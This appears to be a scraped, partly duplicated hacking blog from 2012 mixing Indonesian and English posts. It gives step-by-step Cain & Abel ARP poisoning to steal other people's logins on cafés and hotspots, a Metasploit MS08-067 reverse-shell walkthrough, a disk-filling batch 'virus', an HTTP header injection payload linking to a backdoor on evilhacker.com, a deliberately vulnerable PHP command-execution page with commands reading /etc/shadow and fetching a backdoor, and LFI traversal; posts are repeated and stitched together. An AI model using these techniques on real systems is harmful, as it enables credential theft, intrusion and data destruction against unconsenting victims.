| Siapa
tidak tahu pasangan serasi dalam dunia hacking? ya Cain & Abel,
keduanya merupakan pasangan untuk melakukan hack dalam jaringan dengan
fitur yang cukup lengkap. Nah aku disini mau kasih tutorial cain &
abel + preview. Link download cain & abel:http://www.oxid.it/cain.html Untuk proses installnya gak usah di ajarin ya.. aku anggep semua udah pada bisa…eh ini bisa berjalan dalam 1 jaringan, so kalo kamu ke warnet, orang” yang login FS, FB, dan lainnya bisa didapat user ma passnya. Hal ini juga berlaku di hot spot seperti yang aku lakuin. langsung aja buka cain + abelnya.. klik start / stop sniffer seperti pada gbr :  Abis itu klik tanda + [warna biru] untuk melakukan scan mac address, maka tampilan akan seperti ini :  pada mac address scan langsung klik OK saja maka akan loading dan didapatkan banyak IP address dalam 1 jaringan dan bisa diketahui mac addressnya:  setelah lancar sampai disini kamu bisa langsung ke selanjutnya aja. Klik APR di tab bagian bawah, dan tampilan akan seperti ini:  setelah itu klik tanda + [warna biru] untuk menambahkan IP address yang ingin di poisoning . tampilan akan seperti ini:  di bagian kiri kamu pilih IP routernya [bagaimana kita tahu IP routernya?... apa perlu dijelasin juga?] masuk ke cmd dan ketikan ipconfig /all maka akan diketahui segenap informasi. Nah pikir aja sendiri mana yang jadi routernya ya. yang dibagian kanan adalah IPaddress yang ingin di poisoning. Kalau mau semua 1 jaringan cukup blok semua aja. Nah abis itu klik ok. Abis langkah itu maka tampilannya seperti ini:  Nah statusnya idle kan? itu tandanya belum di poisoning. Klik start / stop arp dan statusnya akan berubah menjadi poisoning:  Adanya daftar dibawah menandakan bahwa ada proses yang sedang dikerjakan langsung saja masuk ke dalam password dengan klik tab password di bagian bawah:  nah klik dibagian kiri HTTP, dan lihat hasilnya:  selesai Itu ada sengaja ada 1 yang gak aku tutup, coba aja masih bisa buat login pa ga |
|
|
Kamis, 17 Mei 2012
Tutorial cain dan abel
Selasa, 15 Mei 2012
Lab Virtual LAN II
Sekarang kita jalankan Windows XP yang telah terinstall di
VirtualBox.
Masuk ke Control Panel – Network Connections maka akan
keluar windows seperti gambar dibawah ini :
Klik kanan Ethernet tersebut lalu pilih properties, maka
akan tampil windows seperti berikut :
Pilih Internet Protocol (TCP/IP) lalu klik tombol
Properties, akan keluar windows untuk memasukan Ip Address dan juga Subnet
Mask, masukan nilai IP 192.168.0.2 dan Subnet Mask 255.255.255.0. Untuk lebih
jelasnya lihat gambar dibawah ini :
Settingan telah selesai, sekarang kita akan mencoba untuk
melakukan Ping dari Guest yaitu Windows XP ke Host atau server yaitu Windows 7.
Buka Command Prompt dengan cara tekan tombol Windows + R,
lalu ketikan cmd. Atau anda bisa menemukannya melalui Start – All Programs – Accessories
– Command Prompt. Maka akan keluar Command Prompt seperti berikut ini :
Lab Virtual LAN I
Beberapa hari ini saya sedang belajar membuat sebuah
aplikasi berbasis Client-Server, namun yang mejadi kendala adalah untuk membuat
sebuah aplikasi client-server minimal harus menggunakan 2 buah komputer, yaitu komputer
pertama sebagai Servernya dan komputer ke 2 sebagai Clientnya, dimana kedua
buah komputer tersebut harus saling terhubung, sedangkan saya hanya memiliki 1
buah komputer saja.
Maka dari itu saya mencari cara bagaimana agar komputer saya
yang cuma satu ini bisa, digunakan untuk belajar bagaimana cara membuat sebuah
aplikasi Client-Server.
Cara mengakalinya adalah dengan menggunakan software bernama
VirtualBox, dimana dengan software VirtualBox ini kita bisa menginstall
berbagai macam jenis sistem operasi di dalam satu komputer.
Ok langsung saja kita pelajari bagaimana membuat sebuah
jaringan LAN (Local Area Network) kecil menggunakan VirtualBox dengan Windows 7
sebaga Host dan Windows XP sebagai guest.
Disini saya menggunakan VirtualBox dengan versi 4.1.2. Asumsikan
kita telah menginstal Windows XP pada VirtualBox, lalu masuk ke Setting –
Network, lalu pada bagian Attached To pilih Host-Only Adapter, untuk lebih
jelasnya lihat gambar dibawah ini :
Selanjutnya kita setting nama komputer dan juga Workgroup
pada windows 7, masuk ke control panel – System – Advanced System Settings.
Lalu akan keluar menu seperti gambar dibawah ini :
Rubah Computer Description, pada contoh diatas saya
menggunakan nama amelia1 kalo anda terserah mau menggantinya dengan nama apa
saja :).
Klik Button Change, maka akan keluar menu seperti gambar
dibawah ini :
Rubah Computer Name sesuai dengan keinginan dan juga buat
nama Workgroup yang nantinya akan digunakan sebagai Workgroup untuk membuat
LAN. Pada contoh diatas saya menggunakan nama virdane1 untuk Computer Name, dan
P1 untuk nama Workgroupnya.
Ok setting computer Name dan Workgroup sudah selesai,
sekarang saatnya kita memberikan IP Address pada Ethernet VirtualBox Host-Only
Network, caranya masuk ke Control Panel – Network and Sharing Center – Change Adapter
Settings lalu pilih VirtualBox Host-Only Network seperti gambar dibawah ini :
Selanjutnya klik kanan Ethernet VirtualBox tersebut lalu pilih
properties lalu pilih Internet Protocol Version 4 (TCP/IPv4) lalu klik tombol
properties. Untuk lebih jelasnya lihat gambar dibawah ini :
Selanjutnya setting IP Addres menjadi 192.168.0.1 dan Subnet
Mask menjadi 255.255.255.0. Untuk lebih jelasnya silahkan lihat gambar dibawah
ini :
Ok kita telah berhasil mensetting Ip Addres VirtualBox, selanjutnya kita akan mensetting Ip Address pada Guest yaitu Windows XP yang terinstall di VirtualBox
7 Cara Membuka Situs yang Diblokir Telkom
1. Cara membuka situs yang diblokir dengan mengganti DNS
Cara yang menurut saya paling ampuh untuk mengakses situs yang diblokir adalah dengan mengganti DNS anda menjadi public DNS. Berikut ini adalah cara mengakses situs yang diblokir dengan mengganti DNS :
- Buka Control Panel >> Network and Internet >> Network and Sharing Center
- Pilih Local Area Connection >> Properties >> Internet Protocol Version 4 >> Properties
- Isikan detail DNS Google berikut ini di setting DNS anda
Preferred DNS Server : 8.8.8.8
Alternate DNS Server : 8.8.4.4
2. Cara membuka situs yang diblokir dengan memakai fitur Turbo pada browser Opera
Browser Opera saat ini dilengkapi dengan fitur Opera Turbo. Tujuan aslinya adalah untuk mempercepat proses browsing dengan cara mengcompress file situs tersebut di server milik opera. Namun kita bisa memanfaatkannya untuk masuk di situs yang diblokir. Berikut ini adalah cara mengaktifkan fitur Opera Turbo :
- Buka browser Opera anda
- Di toolbar bawah sebelah kiri, klik logo “speedometer”.
- Pilih Enable Opera Turbo
3. Cara mengakses situs yang diblokir dengan menggunakan alamat IP situs
Jika sebuah situs diblokir nama domainnya, maka anda bisa membukanya dengan menggunakan alamat IP situs tersebut. Misalkan saja www.pusatgratis.com diblokir domainnya, maka anda bisa mengakses pusatgratis dengan cara berikut ini :
- Lihat IP www.pusatgratis.com dengan cara buka Start >> Run >> ketik CMD >> tekan Enter >> ketik ping www.pusatgratis.com >> tekan Enter
- Ketikkan IP tersebut di browser dan tekan Enter untuk mengaksesnya.
4. Cara mengakses situs yang diblokir dengan menggunakan proxy
Untuk mendapatkan akses ke situs yang diblokir, anda juga bisa menggunakan proxy. Untuk menggunakan trik ini, sebaiknya anda memakai browser Mozilla Firefox.
- Cari daftar proxy gratis yang bisa anda gunakan. Saya biasa mencarinya disini
- Di browser Mozilla Firefox anda, pilih Tools >> Options >> Advanced >> Network
- Pada bagian Connection, pilih Settings.
- Isikan detail proxy yang anda pilih dari proxy list.
- Klik OK
5. Cara membuka situs yang diblokir dengan Web Proxy
Web Proxy juga bisa anda manfaatkan untuk bisa mengatasi situs yang diblokir. Caranya cukup masukkan URL di Web Proxy favorit anda. Web Proxy yang biasa saya gunakan adalah bingproxy.appspot.com
6. Membuka situs yang diblokir menggunakan cache (tembolok) search engine
Baik Google atau Yahoo selalu menyimpan cache di tiap situs yang mereka index. Anda bisa memanfaatkannya untuk membuka situs favorit anda yang diblokir telkom dan pihak-pihak lainnya.
7. Mengakses situs yang diblokir dengan memanfaatkan translator online
Ya..anda bisa memanfaatkan translator online untuk membuka situs yang diblokir. Caranya cukup masukkan URL di form translate kemudian translate dengan tanpa mengubah bahasa. Beberapa translator online yang bisa anda gunakan antara lain :
Google Translate
Bing Translator
Mengganti DNS dengan public DNS (cara 1) adalah cara paling praktis dan paling ampuh untuk membuka situs yang diblokir.
Sebenarnya masih ada cara lain seperti menggunakan web proxy, dll. Namun cara tersebut tidak saya masukkan karena browsing menggunakan web proxy memerlukan kesabaran ekstra (loading lemot, halaman yang di load tidak sempurna, dll)
Cara yang menurut saya paling ampuh untuk mengakses situs yang diblokir adalah dengan mengganti DNS anda menjadi public DNS. Berikut ini adalah cara mengakses situs yang diblokir dengan mengganti DNS :
- Buka Control Panel >> Network and Internet >> Network and Sharing Center
- Pilih Local Area Connection >> Properties >> Internet Protocol Version 4 >> Properties
- Isikan detail DNS Google berikut ini di setting DNS anda
Preferred DNS Server : 8.8.8.8
Alternate DNS Server : 8.8.4.4
2. Cara membuka situs yang diblokir dengan memakai fitur Turbo pada browser Opera
Browser Opera saat ini dilengkapi dengan fitur Opera Turbo. Tujuan aslinya adalah untuk mempercepat proses browsing dengan cara mengcompress file situs tersebut di server milik opera. Namun kita bisa memanfaatkannya untuk masuk di situs yang diblokir. Berikut ini adalah cara mengaktifkan fitur Opera Turbo :
- Buka browser Opera anda
- Di toolbar bawah sebelah kiri, klik logo “speedometer”.
- Pilih Enable Opera Turbo
3. Cara mengakses situs yang diblokir dengan menggunakan alamat IP situs
Jika sebuah situs diblokir nama domainnya, maka anda bisa membukanya dengan menggunakan alamat IP situs tersebut. Misalkan saja www.pusatgratis.com diblokir domainnya, maka anda bisa mengakses pusatgratis dengan cara berikut ini :
- Lihat IP www.pusatgratis.com dengan cara buka Start >> Run >> ketik CMD >> tekan Enter >> ketik ping www.pusatgratis.com >> tekan Enter
- Ketikkan IP tersebut di browser dan tekan Enter untuk mengaksesnya.
4. Cara mengakses situs yang diblokir dengan menggunakan proxy
Untuk mendapatkan akses ke situs yang diblokir, anda juga bisa menggunakan proxy. Untuk menggunakan trik ini, sebaiknya anda memakai browser Mozilla Firefox.
- Cari daftar proxy gratis yang bisa anda gunakan. Saya biasa mencarinya disini
- Di browser Mozilla Firefox anda, pilih Tools >> Options >> Advanced >> Network
- Pada bagian Connection, pilih Settings.
- Isikan detail proxy yang anda pilih dari proxy list.
- Klik OK
5. Cara membuka situs yang diblokir dengan Web Proxy
Web Proxy juga bisa anda manfaatkan untuk bisa mengatasi situs yang diblokir. Caranya cukup masukkan URL di Web Proxy favorit anda. Web Proxy yang biasa saya gunakan adalah bingproxy.appspot.com
6. Membuka situs yang diblokir menggunakan cache (tembolok) search engine
Baik Google atau Yahoo selalu menyimpan cache di tiap situs yang mereka index. Anda bisa memanfaatkannya untuk membuka situs favorit anda yang diblokir telkom dan pihak-pihak lainnya.
7. Mengakses situs yang diblokir dengan memanfaatkan translator online
Ya..anda bisa memanfaatkan translator online untuk membuka situs yang diblokir. Caranya cukup masukkan URL di form translate kemudian translate dengan tanpa mengubah bahasa. Beberapa translator online yang bisa anda gunakan antara lain :
Google Translate
Bing Translator
Mengganti DNS dengan public DNS (cara 1) adalah cara paling praktis dan paling ampuh untuk membuka situs yang diblokir.
Sebenarnya masih ada cara lain seperti menggunakan web proxy, dll. Namun cara tersebut tidak saya masukkan karena browsing menggunakan web proxy memerlukan kesabaran ekstra (loading lemot, halaman yang di load tidak sempurna, dll)
Tutorial Metasploit
We all have seen the movies like hackers,etc we all have imagined to become the one like in movies.
So,
taking a step forward to this dream i am giving a small tutorial on
metasploit. I will be using a terminology msf instead of metaspoilt.
For those who dont know what is msf and have always been facinated by black and green screens, here is how it is done.
I am going to use NESSUS
for vul. scanning and rest of the work will be done by msf. Also, I
will be using msf console because it gives better control over the msf
framework and faster response, using console has one more added
advantage i.e.. it gives geeky look for which we all have a mind set
that its very hi-fi.
Cutting all the discussions, directly coming to the topic.
So
How to do it, I will describe this in steps for the better
understanding, for this purpose i have used two system whom i have
connected via WAN, host os doesnot matter, victim has xp installed on
it.
Basic commands to be known:
Basic commands to be known:
1.searching anything: "search name"
2.set exploit: "use exploit_name"
3.set payload:"set payload payload_name"
4.see info: "info name"
2.set exploit: "use exploit_name"
3.set payload:"set payload payload_name"
4.see info: "info name"
STEP 1:
First instead of using nmap for port scanning , we have used nessus for the vul scanning, nessus has one more added advantage of giving each vul a number which helps in msf to search the proper exploit.
First instead of using nmap for port scanning , we have used nessus for the vul scanning, nessus has one more added advantage of giving each vul a number which helps in msf to search the proper exploit.
So, first we will scan the target.
In the above scan you can see how good nessus is in giving the information about the level of vulernability.
After analysing the report, we see 5 high vulnerability so clicking on the first one, lets see its details:
We can see lots of info about the vulnerability, vulnerability here service flaw at port 445 which has been given the number of MS08-067, this number is going to be of great help in future.
STEP2:
In msf, we are going to search for the proper exploit which can exploit it's vulnerability, so to make our search easier we are gonna type search number, wola see what we have got is the exact name of exploit, but for the other cases where you dont know the number or id , then also we can search by giving various parameters like name eg. search name etc...then we have to choose the best one among them by comparing all the requirnments and working.
Now , since here we have got the exact exploit, then we are going to use this exploit,
command used for it:
use exploit name eg. use windows/smb/ms08_067_netapi
we will check the various parameters by typing: info windows/smb/ms08_067_netapi
STEP3:
Now it's time to set victim's ip address i.e.. RHOST , RPORT is already set to 445
command to set RHOST: setg RHOST 192.168.1.5
Note:
(192.16.1.5 is the ip address of ma pc on local network whom i am going to attack)
STEP4:
After setting exploit, now its time to set the payload, so the main question arises which payload to use now??
Options for this questions can be shortened by typingshow payloads which gives the list of payloads which are compatible with that exploit.
In that we are going to select any payload , i prefer meterpreter/reverse_tcp.
To use this payload type the command: set payload windows/meterpreter/reverse_tcp
so , i will check it's paramater i.e.. LHOST, LPORT etc, now to check that , we type info windows/meterpreter/reverse_tcp
Now here we have to make some change LHOST, LHOST refers to the ip-address of attacker i.e.. mine.
So to set the LHOST we do : setg LHOST 192.168.1.10
all done we are now ready to exploit.
STEP 5:
Finally we type exploit wola.... attack sucessful, session is created.
Now, what to do now?? Just type the command help you will get a list of commands like kill process, shutdown,hash dumps, but i like shell because it gives you the full command line control of the system which you can see from the above picture.
Special Thanks: ICW,AH, guys and b0nd bro for their help in learning.
NOTE:
1.This tutorial is only for learning purpose, for any illegal use author is not responsible.
2.Any form of use of this tutorial should be done at own risk.
After analysing the report, we see 5 high vulnerability so clicking on the first one, lets see its details:
We can see lots of info about the vulnerability, vulnerability here service flaw at port 445 which has been given the number of MS08-067, this number is going to be of great help in future.
STEP2:
In msf, we are going to search for the proper exploit which can exploit it's vulnerability, so to make our search easier we are gonna type search number, wola see what we have got is the exact name of exploit, but for the other cases where you dont know the number or id , then also we can search by giving various parameters like name eg. search name etc...then we have to choose the best one among them by comparing all the requirnments and working.
Now , since here we have got the exact exploit, then we are going to use this exploit,
command used for it:
use exploit name eg. use windows/smb/ms08_067_netapi
we will check the various parameters by typing: info windows/smb/ms08_067_netapi
STEP3:
Now it's time to set victim's ip address i.e.. RHOST , RPORT is already set to 445
command to set RHOST: setg RHOST 192.168.1.5
Note:
(192.16.1.5 is the ip address of ma pc on local network whom i am going to attack)
STEP4:
After setting exploit, now its time to set the payload, so the main question arises which payload to use now??
Options for this questions can be shortened by typingshow payloads which gives the list of payloads which are compatible with that exploit.
In that we are going to select any payload , i prefer meterpreter/reverse_tcp.
To use this payload type the command: set payload windows/meterpreter/reverse_tcp
so , i will check it's paramater i.e.. LHOST, LPORT etc, now to check that , we type info windows/meterpreter/reverse_tcp
Now here we have to make some change LHOST, LHOST refers to the ip-address of attacker i.e.. mine.
So to set the LHOST we do : setg LHOST 192.168.1.10
all done we are now ready to exploit.
STEP 5:
Finally we type exploit wola.... attack sucessful, session is created.
Now, what to do now?? Just type the command help you will get a list of commands like kill process, shutdown,hash dumps, but i like shell because it gives you the full command line control of the system which you can see from the above picture.
Special Thanks: ICW,AH, guys and b0nd bro for their help in learning.
NOTE:
1.This tutorial is only for learning purpose, for any illegal use author is not responsible.
2.Any form of use of this tutorial should be done at own risk.
Sabtu, 12 Mei 2012
Tutorial virus IV
Code :-
______________________________
@echo off
mkdir virus
:loop
cd virus
mkdir virus
echo>text.txt
echo virus in the pc!!!!>>text.txt
goto loop
______________________________
Copy the command and paste in notepad and save as anything.bat
This virus will create infinite virus folders and text.txt file into the virus folder until the disk is completely filled.
Explanation :
mkdir : this command is used to create new folder .
cd : This command is used to change the current directory .
echo >text.txt : This command creates a new file ""text.txt""
echo text >>text.txt : This command writes the text specified after
the echo command to text.txt file.
:loop
commad
goto loop
^^^ looping statement in batch files
______________________________
@echo off
mkdir virus
:loop
cd virus
mkdir virus
echo>text.txt
echo virus in the pc!!!!>>text.txt
goto loop
______________________________
Copy the command and paste in notepad and save as anything.bat
This virus will create infinite virus folders and text.txt file into the virus folder until the disk is completely filled.
Explanation :
mkdir : this command is used to create new folder .
cd : This command is used to change the current directory .
echo >text.txt : This command creates a new file ""text.txt""
echo text >>text.txt : This command writes the text specified after
the echo command to text.txt file.
:loop
commad
goto loop
^^^ looping statement in batch files
Sabtu, 05 Mei 2012
HTTP header injection
If we can inject newline into the header we control , then we will be
able to insert some additional HTTP Header and some nasty body text. I
don't think so that we can compromised a website/server via this
vulnerability. But still it is power for Social Engineering attack,
Phishing, Redirecting to malicious site, downloading backdoor, virtual
defacement, sometime injecting cookie etc. It is much like XSS.
Basically this vulnerability found in "set-cookie" and "location" . If we connect to a website:
set-cookie=PaymentMethod=credit
If this is behavior of the host then we should try to insert Carriage-return and Line-feed :
If the host is vulnerable then it will reply with a additional line "it-is=vulnerable" like this:
Simply a hacker can force the users to download a backdoor:
http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1
We can also create fake Cookie and send the url to the poor victim . Just think smartly and you will find some other way ;)
Be aware!!!
Basically this vulnerability found in "set-cookie" and "location" . If we connect to a website:
nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit HTTP/1.1
After this get request we get like(Try to find it):
If this is behavior of the host then we should try to insert Carriage-return and Line-feed :
nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit%0d%0a it-is=vulnerable HTTP/1.1
If the host is vulnerable then it will reply with a additional line "it-is=vulnerable" like this:
set-cookie=PaymentMethod=credi
it-is=vulnerable Simply a hacker can force the users to download a backdoor:
http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1
We can also create fake Cookie and send the url to the poor victim . Just think smartly and you will find some other way ;)
Be aware!!!
OS command Injection vulnerabity
OS=Operating System command injection vulnerability is a high impact
vulnerability for server/website. If any website has OS command
injection vulnerability Then a malicious hacker can compromise the
website or even the server operating system. If a hacker can detect the
vulnerability then he can run any Operating system command. For example,
If i run the command "rm -r /var/www" on my computer then it is going remove "www" but what if i run this command on my victim's computer ?
How we detect this vulnerability:
Suppose our target address is www.victim.com/vultest/lame.php
And the source code:
<html>
<body>
<title>Vulnerable Page</title>
<p><b>We will test OS command injection vulnerability against this pages. Actually developer don't know how serious the code is.</b></p>
<p><b>Output of command:</b></p>
<?
system($_REQUEST['cmd']);
?>
<p><b><i>This is how OS command injection vulnerability works.</i></b></p>
In that page the php code also:
<? system($_REQUEST['cmd']); ?>(This is white box... Just copy it and paste into a php web page for practice purpose.)This is the OS injection
vulnerability. For this simple mistake anyone can run any os specific
command against the server/website.
So If we run a simple command "ping" :
We get reply on the page (Also other contents). In real world test
we may not see the reply but it delay some time(4-10 seconds?). If this
is the case then we can run any command "ls" .If any of these statement in the source code:Exec
system
passthru
shell_exec
proc_open
pcntl_exec
Then it is highly doubt that the site is vulnerable.
Suppose we don't have source code then how we test? Way is fuzzing(Tools, Manually). Sometime we call it black box testing.To test it we need to write some code for fuzzing purpose or we
can use ready tools which are freely downloadable from internet such as
burp suit, wfuzz, vulnerability scanner, manually by your hand etc. I
think you have logic for automated testing otherwise get some "False"
result by your lam0 tools...
Exploitation :
Note: Doing it on localhost
http://localhost/vultest/lame.php?cmd=ls It output:
db.php
lame.php
login.php
password.txt
test1
We can run any command:
http://localhost/vultest/lame.php?cmd=cat /etc/passwdhttp://localhost/vultest/lame.php?cmd=cat /etc/hostshttp://localhost/vultest/lame.php?cmd=cat /etc/shadow (Require root)http://localhost/vultest/lame.php?cmd=cp /db/to/mysql /herehttp://localhost/vultest/lame.php?cmd=cat wget 192.168.1.212/bacdoor.phpetc. I hope i explained it and now we know what is it and how it can be
exploited by hackers. But really it is very basic, you need to be more
advance.Let me know(sec00rit3y@gmail.com) if you have any questions. Good luck !!! Nikto web vulnerability scanner.
Most of time i use nikto for scanning Targets website. It is easy but
really powerful . Sometime it is sucks too , because of false positive.
Just i will show how to scan your own site . It scan cgi and default
file and directory.
Warning:Don't do anything illegal, I am just
sharing that how i practices . If you are black hat hacker and going
attack third party website , or doing anything illegal then i am not
Responsible for that...
I believe Sharing knowledge mean increasing knowledge .
Nikto is a perl script. So we need to install perl for playing this (Be
aware windows users). If you don't have this tool yet then go and
download it:
http://cirt.net/nikto2 . It is default installed in Backtrack .
Simply ,
root@bt:cd /pentest/web/nikto
root@bt:/pentest/web/nikto# ./nikto.pl -HelpOptions:
-ask+ Whether to ask about submitting updates
yes Ask about each (default)
no Don't ask, don't send
auto Don't ask, just send
-Cgidirs+ Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
-config+ Use this config file
-Display+ Turn on/off display outputs:
1 Show redirects
2 Show cookies received
3 Show all 200/OK responses
4 Show URLs which require authentication
D Debug output
E Display all HTTP errors
P Print progress to STDOUT
S Scrub output of IPs and hostnames
V Verbose output
-dbcheck Check database and other key files for syntax errors
-evasion+ Encoding technique:
1 Random URI encoding (non-UTF8)
2 Directory self-reference (/./)
3 Premature URL ending
4 Prepend long random string
5 Fake parameter
6 TAB as request spacer
7 Change the case of the URL
8 Use Windows directory separator (\)
A Use a carriage return (0x0d) as a request spacer
B Use binary value 0x0b as a request spacer
-Format+ Save file (-o) format:
csv Comma-separated-value
htm HTML Format
msf+ Log to Metasploit
nbe Nessus NBE format
txt Plain text
xml XML Format
(if not specified the format will be taken from the file extension passed to -output)
-Help Extended help information
-host+ Target host
-IgnoreCode Ignore Codes--treat as negative responses
-id+ Host authentication to use, format is id:pass or id:pass:realm
-key+ Client certificate key file
-list-plugins List all available plugins, perform no testing
-maxtime+ Maximum testing time per host
-mutate+ Guess additional file names:
1 Test all files with all root directories
2 Guess for password file names
3 Enumerate user names via Apache (/~user type requests)
4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 Attempt to guess directory names from the supplied dictionary file
-mutate-options Provide information for mutates
-nocache Disables the response cache
-nointeractive Disables interactive features
-nolookup Disables DNS lookups
-nossl Disables the use of SSL
-no404 Disables nikto attempting to guess a 404 page
-output+ Write output to this file
-Pause+ Pause between tests (seconds, integer or float)
-Plugins+ List of plugins to run (default: ALL)
-port+ Port to use (default 80)
-RSAcert+ Client certificate file
-root+ Prepend root value to all requests, format is /directory
-Single Single request mode
-ssl Force ssl mode on port
-Tuning+ Scan tuning:
1 Interesting File / Seen in logs
2 Misconfiguration / Default File
3 Information Disclosure
4 Injection (XSS/Script/HTML)
5 Remote File Retrieval - Inside Web Root
6 Denial of Service
7 Remote File Retrieval - Server Wide
8 Command Execution / Remote Shell
9 SQL Injection
0 File Upload
a Authentication Bypass
b Software Identification
c Remote Source Inclusion
x Reverse Tuning Options (i.e., include all except specified)
-timeout+ Timeout for requests (default 10 seconds)
-Userdbs Load only user databases, not the standard databases
all Disable standard dbs and load only user dbs
tests Disable only db_tests and load udb_tests
-until Run until the specified time or duration
-update Update databases and plugins from CIRT.net
-useproxy Use the proxy defined in nikto.conf
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
+ requires a value
If we give command ./nikto.pl -Help or perl nikto.pl -Help then we get details and all options.
Simply We are going to scan our own company's website ... because we are pentesting it. So easy:
root@bt:/pentest/web/nikto# ./nikto.pl -h target.com :
I have tested it on my localhost for pasting here, There are output/vulnerability we may get:
root@bt:/pentest/web/nikto# ./nikto.pl -h target.com
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: ip address
+ Target Hostname: target.com
+ Target Port: 80
+ Start Time: 2012-01-21 13:48:22 (time formate)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
+ Retrieved x-powered-by header: PHP/5.2.17
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.0-fips appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
+ FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ Default account found for 'Secured Frontpage on PennyStockAdvice.com' at /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/mchat.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /stats/: This might be interesting...
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3268: /_vti_bin/: Directory indexing found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: : Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /ms/: This might be interesting... potential country code (Montserrat)
+ 6474 items checked: 3 error(s) and 32 item(s) reported on remote host
+ End Time: 2012-01-21 13:58:55 (Time formate) (4233 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
As you can see there are many thing Nikto found out. Nikto is very effective for finding default file,directory.
Note: you have to understand the output of tools otherwise you can do nothing.
we can use various options(see help).... For example a command:
root@bt:/pentest/web/nikto#./nikto.pl -host target.com -root /admin -port 443 -evasion 1
How is this working ? Simple:
-host=-h(The target site)
-root=send all request to /admin directory
-port = The site is not running on default 80 , I know it is running on 443.
-evasion=IDs evasion. Evasion 1(Random URI encoding (non-UTF8))
I hope you got some idea about it... Just try to believe that Learning to use tools peoples does not need hacking training.
If your mind is skid then tools may not help you.. . Be aware about that before using tools .
For more information Visit http://cirt.net/nikto2
Good Luck!!!
Exploiting Local File Inclusion vulnerability(LFI)
Local File Inclusion mean loading local file such as /etc/passwd ,
/etc/host on the php web pages. There are many programing mistake for
occurring this vulnerability. When Programer put some bad in the php web
pages that time this vulnerable occur:
include
include_once
require
require_once
fopen
For example, suppose in a pages :
This is code is vulnerable to Local file inclusion vulnerable.
Suppose , Our target url is www.n00bprogammer.com/vulnerable/
If you directly submit this url on browser address bar then you get web page , That's mean there is a file "index.php"
If we try like :
www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)
www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd
And it output :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
